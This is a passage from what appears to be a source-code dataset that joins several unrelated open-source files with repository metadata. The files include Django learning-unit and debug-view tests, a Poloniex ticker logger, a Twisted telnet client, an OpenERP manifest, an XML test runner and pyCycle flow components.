"specific_title": "Mon cours",
"specific_title_english": self.my_course,
"credits": Decimal('45.00'),
"internship_subtype": internship_subtypes.PROFESSIONAL_INTERNSHIP,
"status": False,
"session": learning_unit_year_session.SESSION_123,
"quadrimester": quadrimesters.LearningUnitYearQuadrimester.Q2.name,
"attribution_procedure": attribution_procedure.EXTERNAL,
"language": self.other_language
}
update_learning_unit_year_with_report(self.learning_unit_year, fields_to_update, {})
fields_to_update["language"] = fields_to_update["language"].pk
self.assert_fields_updated(self.learning_unit_year, fields_to_update)
def test_with_learning_container_year_fields_to_update(self):
fields_to_update = {
"common_title": "Mon common",
"common_title_english": "My common",
"team": True,
"is_vacant": True,
"type_declaration_vacant": vacant_declaration_type.VACANT_NOT_PUBLISH
}
update_learning_unit_year_with_report(self.learning_unit_year, fields_to_update, {})
self.learning_container_year.refresh_from_db()
new_lcy_values = model_to_dict(self.learning_container_year, fields=fields_to_update.keys())
expected_model_dict_values = fields_to_update
self.assertDictEqual(expected_model_dict_values, new_lcy_values)
def test_apply_updates_on_next_learning_unit_years(self):
a_learning_unit = self.setup_learning_unit(self.starting_academic_year)
learning_unit_years = self.setup_list_of_learning_unit_years_full(self.list_of_academic_years_after_now,
a_learning_unit,
learning_unit_year_periodicity.ANNUAL)
learning_unit_fields_to_update = {
"faculty_remark": self.faculty_remark
}
learning_unit_year_fields_to_update = {
"specific_title_english": self.my_course,
"credits": 45,
"attribution_procedure": attribution_procedure.EXTERNAL
}
learning_container_year_fields_to_update = {
"team": True,
"is_vacant": True,
"type_declaration_vacant": vacant_declaration_type.VACANT_NOT_PUBLISH
}
fields_to_update = dict()
fields_to_update.update(learning_unit_fields_to_update)
fields_to_update.update(learning_unit_year_fields_to_update)
fields_to_update.update(learning_container_year_fields_to_update)
update_learning_unit_year_with_report(learning_unit_years[1], fields_to_update, {},
override_postponement_consistency=True)
self.assert_fields_not_updated(learning_unit_years[0], exclude="learning_component_years")
self.assert_fields_not_updated(learning_unit_years[0].learning_container_year)
for index, luy in enumerate(learning_unit_years[1:]):
self.assert_fields_updated(luy.learning_unit, learning_unit_fields_to_update)
if index == 0:
self.assert_fields_updated(luy, learning_unit_year_fields_to_update)
self.assert_fields_updated(luy.learning_container_year, learning_container_year_fields_to_update)
else:
self.assert_fields_updated(luy.learning_container_year, learning_container_year_fields_to_update,
exclude=["is_vacant", "type_declaration_vacant", 'team'])
self.assert_fields_not_updated(luy.learning_container_year, fields=["team"])
self.assert_fields_updated(luy, learning_unit_year_fields_to_update, exclude=["attribution_procedure"])
self.assert_fields_not_updated(luy, fields=["attribution_procedure"])
def test_when_not_reporting(self):
a_learning_unit = self.setup_learning_unit(self.starting_academic_year)
learning_unit_years = self.setup_list_of_learning_unit_years_full(
self.list_of_academic_years_after_now,
a_learning_unit,
periodicity=learning_unit_year_periodicity.ANNUAL
)
learning_unit_fields_to_update = {
"faculty_remark": self.faculty_remark
}
learning_unit_year_fields_to_update = {
"specific_title_english": self.my_course,
"credits": 45,
"attribution_procedure": attribution_procedure.EXTERNAL
}
learning_container_year_fields_to_update = {
"team": True,
"is_vacant": True,
"type_declaration_vacant": vacant_declaration_type.VACANT_NOT_PUBLISH
}
fields_to_update = dict()
fields_to_update.update(learning_unit_fields_to_update)
fields_to_update.update(learning_unit_year_fields_to_update)
fields_to_update.update(learning_container_year_fields_to_update)
update_learning_unit_year_with_report(learning_unit_years[0], fields_to_update, {}, with_report=False)
self.assert_fields_updated(learning_unit_years[0].learning_unit, learning_unit_fields_to_update)
self.assert_fields_updated(learning_unit_years[0], learning_unit_year_fields_to_update)
self.assert_fields_updated(learning_unit_years[0].learning_container_year,
learning_container_year_fields_to_update)
for luy in learning_unit_years[1:]:
self.assert_fields_not_updated(luy, exclude="learning_component_years")
self.assert_fields_not_updated(luy.learning_container_year)
def assert_fields_updated(self, instance, fields_value, exclude=None):
if exclude is None:
exclude = []
instance.refresh_from_db()
instance_values = model_to_dict(instance, fields=fields_value.keys(), exclude=exclude)
fields_value_without_excluded = {field: value for field, value in fields_value.items() if field not in exclude}
self.assertDictEqual(fields_value_without_excluded, instance_values)
def assert_fields_not_updated(self, instance, fields=None, exclude=None):
past_instance_values = model_to_dict(instance, fields, exclude)
instance.refresh_from_db()
new_instance_values = model_to_dict(instance, fields, exclude)
self.maxDiff = None
self.assertDictEqual(past_instance_values, new_instance_values)
class TestUpdateLearningUnitEntities(TestCase, LearningUnitsMixin):
@classmethod
def setUpTestData(cls):
cls.setup_academic_years()
def setUp(self):
self.learning_container_year = LearningContainerYearFactory(
academic_year=self.starting_academic_year,
container_type=learning_container_year_types.COURSE,
type_declaration_vacant=vacant_declaration_type.DO_NOT_ASSIGN,
requirement_entity=EntityFactory(),
allocation_entity=EntityFactory(),
additional_entity_1=EntityFactory(),
additional_entity_2=EntityFactory(),
)
self.learning_unit_year = LearningUnitYearFactory(
learning_container_year=self.learning_container_year,
academic_year=self.starting_academic_year,
subtype=learning_unit_year_subtypes.FULL,
attribution_procedure=attribution_procedure.INTERNAL_TEAM)
self.learning_component_year = LearningComponentYearFactory(
learning_unit_year=self.learning_unit_year,
acronym="PM",
type=learning_component_year_type.LECTURING)
def test_with_no_entities_to_update(self):
update_learning_unit_year_with_report(self.learning_unit_year, {}, {})
self.assert_entity_has_not_changed(self.learning_container_year, REQUIREMENT_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year, ALLOCATION_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year, ADDITIONAL_REQUIREMENT_ENTITY_1)
self.assert_entity_has_not_changed(self.learning_container_year, ADDITIONAL_REQUIREMENT_ENTITY_2)
def test_with_one_entity_to_update(self):
a_new_requirement_entity = EntityFactory()
entities_to_update = {entity_container_year_link_type.REQUIREMENT_ENTITY: a_new_requirement_entity}
update_learning_unit_year_with_report(self.learning_unit_year, {}, entities_to_update)
self.assert_entity_has_not_changed(self.learning_container_year, ALLOCATION_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year, ADDITIONAL_REQUIREMENT_ENTITY_1)
self.assert_entity_has_not_changed(self.learning_container_year, ADDITIONAL_REQUIREMENT_ENTITY_2)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_requirement_entity, REQUIREMENT_ENTITY)
def test_with_all_entities_to_update(self):
a_new_requirement_entity = EntityFactory()
a_new_allocation_entity = EntityFactory()
a_new_additional_entity_1 = EntityFactory()
a_new_additional_entity_2 = EntityFactory()
entities_to_update = {
entity_container_year_link_type.REQUIREMENT_ENTITY: a_new_requirement_entity,
entity_container_year_link_type.ALLOCATION_ENTITY: a_new_allocation_entity,
entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_1: a_new_additional_entity_1,
entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_2: a_new_additional_entity_2
}
update_learning_unit_year_with_report(self.learning_unit_year, {}, entities_to_update)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_requirement_entity, REQUIREMENT_ENTITY)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_allocation_entity, ALLOCATION_ENTITY)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_additional_entity_1,
ADDITIONAL_REQUIREMENT_ENTITY_1)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_additional_entity_2,
ADDITIONAL_REQUIREMENT_ENTITY_2)
def test_with_entity_set_to_none(self):
entities_to_update = {entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_2: None}
update_learning_unit_year_with_report(self.learning_unit_year, {}, entities_to_update)
self.assert_entity_has_not_changed(self.learning_container_year,
entity_container_year_link_type.REQUIREMENT_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year,
entity_container_year_link_type.ALLOCATION_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year,
entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_1)
self.learning_container_year.refresh_from_db()
self.assertIsNone(self.learning_container_year.additional_entity_2)
def test_with_entity_none_and_full_in(self):
self.learning_container_year.additional_entity_2 = None
self.learning_container_year.save()
a_new_additional_requirement_entity = EntityFactory()
entities_to_update = {
entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_2: a_new_additional_requirement_entity
}
update_learning_unit_year_with_report(self.learning_unit_year, {}, entities_to_update)
self.assertTrue(
LearningContainerYear.objects.filter(
pk=self.learning_container_year.id,
additional_entity_2=a_new_additional_requirement_entity,
).exists()
)
def test_apply_changes_to_next_learning_unit_year(self):
a_learning_unit = self.setup_learning_unit(self.starting_academic_year)
learning_unit_years = self.setup_list_of_learning_unit_years_full(
self.list_of_academic_years_after_now,
a_learning_unit,
periodicity=learning_unit_year_periodicity.ANNUAL
)
current_requirement_entity = EntityFactory()
for luy in learning_unit_years:
container_year = luy.learning_container_year
container_year.requirement_entity = current_requirement_entity
container_year.save()
a_new_requirement_entity = EntityFactory()
entities_to_update = {entity_container_year_link_type.REQUIREMENT_ENTITY: a_new_requirement_entity}
update_learning_unit_year_with_report(
learning_unit_years[1],
{},
entities_to_update,
override_postponement_consistency=True
)
self.assert_entity_has_not_changed(
learning_unit_years[0].learning_container_year,
entity_container_year_link_type.REQUIREMENT_ENTITY
)
for luy in learning_unit_years[1:]:
self.assert_entity_has_been_modified(
luy.learning_container_year,
a_new_requirement_entity,
REQUIREMENT_ENTITY
)
def test_with_no_report(self):
a_learning_unit = self.setup_learning_unit(self.starting_academic_year)
learning_unit_years = self.setup_list_of_learning_unit_years_full(
self.list_of_academic_years_after_now,
a_learning_unit,
periodicity=learning_unit_year_periodicity.ANNUAL
)
current_requirement_entity = EntityFactory()
for luy in learning_unit_years:
container_year = luy.learning_container_year
container_year.requirement_entity = current_requirement_entity
container_year.save()
a_new_requirement_entity = EntityFactory()
entities_to_update = {entity_container_year_link_type.REQUIREMENT_ENTITY: a_new_requirement_entity}
update_learning_unit_year_with_report(learning_unit_years[0], {}, entities_to_update, with_report=False)
self.assert_entity_has_been_modified(
learning_unit_years[0].learning_container_year,
a_new_requirement_entity,
REQUIREMENT_ENTITY
)
for luy in learning_unit_years[1:]:
self.assert_entity_has_not_changed(
luy.learning_container_year,
entity_container_year_link_type.REQUIREMENT_ENTITY
)
def assert_entity_has_not_changed(self, learning_container_year, entity_link_type):
past_entity = learning_container_year.get_entity_from_type(entity_link_type)
learning_container_year.refresh_from_db()
current_entity = learning_container_year.get_entity_from_type(entity_link_type)
self.assertEqual(past_entity, current_entity)
def assert_entity_has_been_modified(self, learning_container_year, expected_entity, entity_link_type):
learning_container_year.refresh_from_db()
self.assertEqual(learning_container_year.get_entity_from_type(entity_link_type), expected_entity)
class TestReportVolumes(TestCase):
@classmethod
def setUpTestData(cls):
cls.learning_unit = LearningUnitFactory()
cls.academic_years = AcademicYearFactory.produce_in_future(quantity=3)
cls.learning_unit_years = [LearningUnitYearFactory(academic_year=acy) for acy in cls.academic_years]
def setUp(self) -> None:
self.lecturing_component_years = [
LecturingLearningComponentYearFactory(learning_unit_year=luy) for luy in self.learning_unit_years
]
self.practical_component_years = [
PracticalLearningComponentYearFactory(learning_unit_year=luy) for luy in self.learning_unit_years
]
def test_should_report_values_from_reference_learning_unit_year_to_others(self):
reference, *others = self.learning_unit_years
reference_lecturing_component = self.lecturing_component_years[0]
reference_lecturing_component.hourly_volume_partial_q1 = 20
reference_lecturing_component.hourly_volume_partial_q2 = 35
reference_lecturing_component.hourly_volume_total_annual = 55
reference_lecturing_component.save()
reference_practical_component = self.practical_component_years[0]
reference_practical_component.hourly_volume_partial_q1 = 18
reference_practical_component.hourly_volume_partial_q2 = 2
reference_practical_component.hourly_volume_total_annual = 20
reference_practical_component.save()
_report_volume(reference, others)
for lecturing_component in self.lecturing_component_years[1:]:
lecturing_component.refresh_from_db()
self.assert_component_volumes_equal(reference_lecturing_component, lecturing_component)
for practical_component in self.practical_component_years[1:]:
practical_component.refresh_from_db()
self.assert_component_volumes_equal(reference_practical_component, practical_component)
def assert_component_volumes_equal(self, first_component, second_component):
pertinent_fields = [
"planned_classes",
"hourly_volume_total_annual",
"hourly_volume_partial_q1",
"hourly_volume_partial_q2",
"repartition_volume_requirement_entity",
"repartition_volume_additional_entity_1",
"repartition_volume_additional_entity_2",
]
self.assertDictEqual(
model_to_dict(first_component, fields=pertinent_fields),
model_to_dict(second_component, fields=pertinent_fields)
)
| agpl-3.0 | -4,031,647,468,622,149,600 | 52.628183 | 120 | 0.684601 | false |
ffee21/jpdanta | sandbox/sandbox3.py | 1 | 1769 | import datetime
import requests
import pymysql.cursors
def getconn():
PASSPHRASE_FILE = './sandbox/.passphrase'
PASSPHRASE = ''
with open(PASSPHRASE_FILE) as f:
        PASSPHRASE = f.read().strip()  # drop the trailing newline kept by read() so the password is not corrupted
connection = pymysql.connect(host='localhost',user='user',password=PASSPHRASE,db='jpdanta')
return connection
def getticker():
PUBLIC_TICKER_URL = "https://poloniex.com/public?command=returnTicker"
r = requests.get(PUBLIC_TICKER_URL)
ticker = r.json()
return ticker
def getvaluelist(ticker):
btc_based_coins = list(filter(lambda x: x.startswith("BTC_"), list(ticker.keys())))
MZR_LIST = ['last', 'lowestAsk', 'highestBid', 'percentChange', 'baseVolume', 'quoteVolume', 'high24hr', 'low24hr']
return_list = []
for coin in btc_based_coins:
for mzr in MZR_LIST:
return_list.append([coin, mzr, ticker[coin][mzr]])
return return_list
def insertticker(conn, value_list, timestamp):
with conn.cursor() as cursor:
sql = "INSERT INTO `ticker` (`mzrtime`, `coin`, `mzr`, `value`) VALUES (%s, %s, %s, %s)"
for item in value_list:
cursor.execute(sql, (timestamp, item[0], item[1], item[2]))
conn.commit()
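# A possible batch variant (hypothetical, not used by the script below): pymysql's
# Cursor.executemany() runs the same parameterized INSERT for every row in a single
# call, which is usually faster than looping over cursor.execute().
def insertticker_batch(conn, value_list, timestamp):
    with conn.cursor() as cursor:
        sql = "INSERT INTO `ticker` (`mzrtime`, `coin`, `mzr`, `value`) VALUES (%s, %s, %s, %s)"
        cursor.executemany(sql, [(timestamp, coin, mzr, value) for coin, mzr, value in value_list])
    conn.commit()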
def log(conn, message, level=0):
with conn.cursor() as cursor:
sql = "INSERT INTO `log` (`level`, `body`) VALUES (%s, %s)"
cursor.execute(sql, (level, message))
conn.commit()
print(str(datetime.datetime.now()) + ": [" + str(level) + "] " + message)
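# Script body: fetch one ticker snapshot from Poloniex and store it in MySQL.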
conn = getconn()
log(conn, "Fetching the ticker", 0)
timestamp = datetime.datetime.now()
ticker_now = getticker()
log(conn, "Inserting into DB", 0)
value_list = getvaluelist(ticker_now)
insertticker(conn, value_list, timestamp)
log(conn, "Finishing ticker insert", 0)
conn.close() | apache-2.0 | 6,508,561,294,485,118,000 | 30.607143 | 119 | 0.645562 | false |
chrisnorman7/mmc2 | connection.py | 1 | 1423 | """MMC2 connection objects."""
from twisted.protocols.basic import LineReceiver
from twisted.conch.telnet import TelnetProtocol
from twisted.internet.protocol import ClientFactory
import logging, command_parser, application
logger = logging.getLogger('Connection')
class MyClientFactory(ClientFactory):
def __init__(self):
self.protocol = Protocol(self)
self.transport = None
def buildProtocol(self, addr):
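        # Reuses the single Protocol instance created in __init__ for every
        # (re)connection rather than building a fresh protocol per connection.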
return self.protocol
class Protocol(TelnetProtocol):
def __init__(self, factory):
self.factory = factory
def connectionMade(self):
logger.info('Connected.')
self.factory.transport = self.transport
application.frame.SetTitle()
def connectionLost(self, reason):
logger.info('Connection lost: %s.', reason.getErrorMessage())
application.host = None
application.port = None
application.frame.SetTitle()
def dataReceived(self, data):
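        # Raw telnet data may arrive in arbitrary chunks, so a line split across
        # two packets is handled here as two separate lines; LineReceiver
        # (imported above) would be the usual way to buffer on '\r\n' instead.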
for line in data.split('\r\n'):
application.lines += 1
application.frame.SetStatusText('Lines received: %s.' % application.lines)
command_parser.handle_incoming(line)
def disableLocal(self, option):
logger.debug('Disable local: %s.', option)
def enableLocal(self, option):
logger.debug('Enable local: %s.', option)
def disableRemote(self, option):
logger.debug('Disable remote: %s.', option)
def enableRemote(self, option):
logger.debug('Enable remote: %s.', option)
| mpl-2.0 | 2,702,768,374,433,925,600 | 27.040816 | 77 | 0.711876 | false |
CG-F16-7-Rutgers/steersuite-rutgers | steerstats/steersuite/AxisAlignedBox.py | 8 | 1603 |
class AxisAlignedBox(object):
def __init__(self, xmin, xmax, ymin, ymax, zmin, zmax):
        self._xmin = xmin
        self._xmax = xmax
        self._ymin = ymin
        self._ymax = ymax
        self._zmin = zmin
        self._zmax = zmax
def get_xmin(self):
return self._xmin
def get_xmax(self):
return self._xmax
def get_ymin(self):
return self._ymin
def get_ymax(self):
return self._ymax
def get_zmin(self):
return self._zmin
def get_zmax(self):
return self._zmax
def set_xmin(self, value):
self._xmin = value
def set_xmax(self, value):
self._xmax = value
def set_ymin(self, value):
self._ymin = value
def set_ymax(self, value):
self._ymax = value
def set_zmin(self, value):
self._zmin = value
def set_zmax(self, value):
self._zmax = value
def del_xmin(self):
del self._xmin
def del_xmax(self):
del self._xmax
def del_ymin(self):
del self._ymin
def del_ymax(self):
del self._ymax
def del_zmin(self):
del self._zmin
def del_zmax(self):
del self._zmax
xmin = property(get_xmin, set_xmin, del_xmin, "xmin's docstring")
xmax = property(get_xmax, set_xmax, del_xmax, "xmax's docstring")
ymin = property(get_ymin, set_ymin, del_ymin, "ymin's docstring")
ymax = property(get_ymax, set_ymax, del_ymax, "ymax's docstring")
zmin = property(get_zmin, set_zmin, del_zmin, "zmin's docstring")
zmax = property(get_zmax, set_zmax, del_zmax, "zmax's docstring")
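# Minimal usage sketch (illustrative only, not part of the original module):
if __name__ == '__main__':
    box = AxisAlignedBox(0.0, 10.0, 0.0, 5.0, -2.0, 2.0)
    box.xmax = 12.0                     # setters go through the property objects
    assert box.xmax - box.xmin == 12.0  # width after resizing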
| gpl-3.0 | 2,618,379,122,339,298,300 | 26.655172 | 69 | 0.576419 | false |
OSSESAC/odoopubarquiluz | extra-addons/l10n_co_toponyms/__openerp__.py | 8 | 1623 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 Gabriel Henao.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Colombia Localization Toponyms",
"version": "1.0",
"description": """
Colombian toponyms.
List of Colombian departments and municipalities
""",
"author": "Gabriel Henao and Cubic ERP",
"website": "http://cubicERP.com",
"category": "Localization/Toponyms",
"depends": [
"base_state_ubication",
],
"data":[
"l10n_states_co_data.xml",
"l10n_cities_co_data.xml",
],
"demo_xml": [
],
"update_xml": [
],
"active": False,
"installable": True,
"certificate" : "",
"images": [
],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -328,470,862,157,085,950 | 31.46 | 78 | 0.583487 | false |
disqus/mule | mule/runners/xml.py | 1 | 7409 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
"""unittest-xml-reporting is a PyUnit-based TestRunner that can export test
results to XML files that can be consumed by a wide range of tools, such as
build systems, IDEs and Continuous Integration servers.
This module provides the XMLTestRunner class, which is heavily based on the
default TextTestRunner. This makes the XMLTestRunner very simple to use.
The script below, adapted from the unittest documentation, shows how to use
XMLTestRunner in a very simple way. In fact, the only difference between this
script and the original one is the last line:
import random
import unittest
import xmlrunner
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.seq = range(10)
def test_shuffle(self):
# make sure the shuffled sequence does not lose any elements
random.shuffle(self.seq)
self.seq.sort()
self.assertEqual(self.seq, range(10))
def test_choice(self):
element = random.choice(self.seq)
self.assert_(element in self.seq)
def test_sample(self):
self.assertRaises(ValueError, random.sample, self.seq, 20)
for element in random.sample(self.seq, 5):
self.assert_(element in self.seq)
if __name__ == '__main__':
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='test-reports'))
"""
import os
from mule.runners.text import _TextTestResult, TextTestRunner, _TestInfo
class _XMLTestResult(_TextTestResult):
"A test result class that can express test results in a XML report."
def _get_info_by_testcase(self):
"""This method organizes test results by TestCase module. This
information is used during the report generation, where a XML report
will be generated for each TestCase.
"""
tests_by_testcase = {}
for tests in (self.successes, self.failures, self.errors, self.skipped):
for test_info in tests:
testcase = type(test_info.test_method)
# Ignore module name if it is '__main__'
module = testcase.__module__ + '.'
if module == '__main__.':
module = ''
testcase_name = module + testcase.__name__
                if testcase_name not in tests_by_testcase:
tests_by_testcase[testcase_name] = []
tests_by_testcase[testcase_name].append(test_info)
return tests_by_testcase
@classmethod
def _report_testsuite(cls, suite_name, tests, xml_document):
"Appends the testsuite section to the XML document."
testsuite = xml_document.createElement('testsuite')
xml_document.appendChild(testsuite)
testsuite.setAttribute('name', suite_name)
testsuite.setAttribute('tests', str(len(tests)))
testsuite.setAttribute('time', '%.3f' % \
sum(map(lambda e: e.get_elapsed_time(), tests)))
        # Materialize the matching tests as lists so len() works on both Python 2 and 3.
        failures = [e for e in tests if e.outcome == _TestInfo.FAILURE]
        testsuite.setAttribute('failures', str(len(failures)))
        errors = [e for e in tests if e.outcome == _TestInfo.ERROR]
        testsuite.setAttribute('errors', str(len(errors)))
        skipped = [e for e in tests if e.outcome == _TestInfo.SKIPPED]
        testsuite.setAttribute('skips', str(len(skipped)))
return testsuite
@classmethod
def _report_testcase(cls, suite_name, test_result, xml_testsuite, xml_document):
"Appends a testcase section to the XML document."
testcase = xml_document.createElement('testcase')
xml_testsuite.appendChild(testcase)
testcase.setAttribute('classname', suite_name)
testcase.setAttribute('name', test_result.test_method._testMethodName)
testcase.setAttribute('time', '%.3f' % test_result.get_elapsed_time())
if (test_result.outcome != _TestInfo.SUCCESS):
elem_name = ('failure', 'error', 'skip')[test_result.outcome-1]
failure = xml_document.createElement(elem_name)
testcase.appendChild(failure)
failure.setAttribute('type', test_result.err[0].__name__)
failure.setAttribute('message', str(test_result.err[1]))
error_info = test_result.get_error_info()
failureText = xml_document.createCDATASection(error_info)
failure.appendChild(failureText)
@classmethod
def _report_output(cls, suite, tests, test_runner, xml_testsuite, xml_document):
"Appends the system-out and system-err sections to the XML document."
systemout = xml_document.createElement('system-out')
xml_testsuite.appendChild(systemout)
stdout = '\n'.join(filter(None, (t.test_method.stdout.getvalue() for t in tests))).strip()
systemout_text = xml_document.createCDATASection(stdout)
systemout.appendChild(systemout_text)
systemerr = xml_document.createElement('system-err')
xml_testsuite.appendChild(systemerr)
stderr = '\n'.join(filter(None, (t.test_method.stderr.getvalue() for t in tests))).strip()
systemerr_text = xml_document.createCDATASection(stderr)
systemerr.appendChild(systemerr_text)
def generate_reports(self, test_runner):
"Generates the XML reports to a given XMLTestRunner object."
from xml.dom.minidom import Document
all_results = self._get_info_by_testcase()
if type(test_runner.output) == str and not \
os.path.exists(test_runner.output):
os.makedirs(test_runner.output)
for suite, tests in all_results.items():
doc = Document()
# Build the XML file
testsuite = _XMLTestResult._report_testsuite(suite, tests, doc)
for test in tests:
_XMLTestResult._report_testcase(suite, test, testsuite, doc)
_XMLTestResult._report_output(suite, tests, test_runner, testsuite, doc)
xml_content = doc.toprettyxml(indent='\t')
if type(test_runner.output) is str:
report_file = open(os.path.join(test_runner.output, '%s.xml' % (suite,)), 'w')
try:
report_file.write(xml_content)
finally:
report_file.close()
else:
# Assume that test_runner.output is a stream
test_runner.output.write(xml_content)
class XMLTestRunner(TextTestRunner):
"""A test runner class that outputs the results in JUnit like XML files."""
def __init__(self, output='xunit', **kwargs):
super(XMLTestRunner, self).__init__(**kwargs)
self.output = output
def _makeResult(self):
"""Create the TestResult object which will be used to store
information about the executed tests.
"""
return _XMLTestResult(self.stream, self.descriptions, \
self.verbosity, self.elapsed_times)
def run(self, test):
"Run the given test case or test suite."
result = super(XMLTestRunner, self).run(test)
# self.stream.writeln('Generating XML reports...')
result.generate_reports(self)
return result | apache-2.0 | -2,458,362,929,389,439,000 | 39.271739 | 98 | 0.623296 | false |
HyperloopTeam/FullOpenMDAO | lib/python2.7/site-packages/pycycle-0.1-py2.7.egg/pycycle/start.py | 3 | 1501 | from openmdao.main.api import Component
from openmdao.lib.datatypes.api import Float, VarTree
from pycycle.flowstation import FlowStation, FlowStationVar
from pycycle.cycle_component import CycleComponent
class FlowStart(CycleComponent):
"""Flow initialization"""
W = Float(1, iotype="in", desc="mass flow rate", units="lbm/s")
Pt = Float(14.7, iotype="in", desc="total pressure", units="psi")
Tt = Float(518, iotype="in", desc="total temperature", units="degR")
Mach = Float(.1, iotype="in", desc="Mach Number")
area_des = Float(iotype="out", desc="flow area at the design condition")
Fl_O = FlowStationVar(iotype="out", desc="outgoing flow at the specified conditions", copy=None)
def execute(self):
Fl_O = self.Fl_O
Fl_O.setTotalTP(self.Tt, self.Pt)
Fl_O.W = self.W
Fl_O.Mach = self.Mach
if self.run_design:
self.area_des = Fl_O.area
class FlowStartStatic(CycleComponent):
W = Float(1, iotype="in", desc="mass flow rate", units="lbm/s")
Ps = Float(14.7, iotype="in", desc="total pressure", units="psi")
Ts = Float(518, iotype="in", desc="total temperature", units="degR")
Mach = Float(.1, iotype="in", desc="Mach Number")
Fl_O = FlowStationVar(iotype="out", desc="outgoing flow at the specified conditions", copy=None)
def execute(self):
self.Fl_O.setStaticTsPsMN(self.Ts, self.Ps, self.Mach)
self.Fl_O.W = self.W
self.Fl_O.Mach = self.Mach
| gpl-2.0 | -4,872,653,714,009,063,000 | 30.270833 | 100 | 0.650233 | false |
camilonova/django | tests/view_tests/tests/test_debug.py | 12 | 45828 | import importlib
import inspect
import os
import re
import sys
import tempfile
from io import StringIO
from django.conf.urls import url
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db import DatabaseError, connection
from django.template import TemplateDoesNotExist
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.utils import LoggingCaptureMixin, patch_logger
from django.urls import reverse
from django.utils.encoding import force_bytes
from django.utils.functional import SimpleLazyObject
from django.views.debug import (
CLEANSED_SUBSTITUTE, CallableSettingWrapper, ExceptionReporter,
cleanse_setting, technical_500_response,
)
from ..views import (
custom_exception_reporter_filter_view, index_page,
multivalue_dict_key_error, non_sensitive_view, paranoid_view,
sensitive_args_function_caller, sensitive_kwargs_function_caller,
sensitive_method_view, sensitive_view,
)
PY36 = sys.version_info >= (3, 6)
class User:
def __str__(self):
return 'jacob'
class WithoutEmptyPathUrls:
urlpatterns = [url(r'url/$', index_page, name='url')]
class CallableSettingWrapperTests(SimpleTestCase):
""" Unittests for CallableSettingWrapper
"""
def test_repr(self):
class WrappedCallable:
def __repr__(self):
return "repr from the wrapped callable"
def __call__(self):
pass
actual = repr(CallableSettingWrapper(WrappedCallable()))
self.assertEqual(actual, "repr from the wrapped callable")
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
class DebugViewTests(LoggingCaptureMixin, SimpleTestCase):
def test_files(self):
response = self.client.get('/raises/')
self.assertEqual(response.status_code, 500)
data = {
'file_data.txt': SimpleUploadedFile('file_data.txt', b'haha'),
}
response = self.client.post('/raises/', data)
self.assertContains(response, 'file_data.txt', status_code=500)
self.assertNotContains(response, 'haha', status_code=500)
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
# Ensure no 403.html template exists to test the default case.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}])
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
# Set up a test 403.html template.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'loaders': [
('django.template.loaders.locmem.Loader', {
'403.html': 'This is a test template for a 403 error ({{ exception }}).',
}),
],
},
}])
def test_403_template(self):
response = self.client.get('/raises403/')
self.assertContains(response, 'test template', status_code=403)
self.assertContains(response, '(Insufficient Permissions).', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
def test_raised_404(self):
response = self.client.get('/views/raises404/')
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
def test_404_not_in_urls(self):
response = self.client.get('/not-in-urls')
self.assertNotContains(response, "Raised by:", status_code=404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
@override_settings(ROOT_URLCONF=WithoutEmptyPathUrls)
def test_404_empty_path_not_in_urls(self):
response = self.client.get('/')
self.assertContains(response, "The empty path didn't match any of these.", status_code=404)
def test_technical_404(self):
response = self.client.get('/views/technical404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.technical404", status_code=404)
def test_classbased_technical_404(self):
response = self.client.get('/views/classbased404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.Http404View", status_code=404)
def test_non_l10ned_numeric_ids(self):
"""
        Numeric IDs and line numbers in fancy traceback context blocks shouldn't be localized.
"""
with self.settings(DEBUG=True, USE_L10N=True):
response = self.client.get('/raises500/')
# We look for a HTML fragment of the form
# '<div class="context" id="c38123208">', not '<div class="context" id="c38,123,208"'
self.assertContains(response, '<div class="context" id="', status_code=500)
match = re.search(b'<div class="context" id="(?P<id>[^"]+)">', response.content)
self.assertIsNotNone(match)
id_repr = match.group('id')
self.assertFalse(
re.search(b'[^c0-9]', id_repr),
"Numeric IDs in debug response HTML page shouldn't be localized (value: %s)." % id_repr.decode()
)
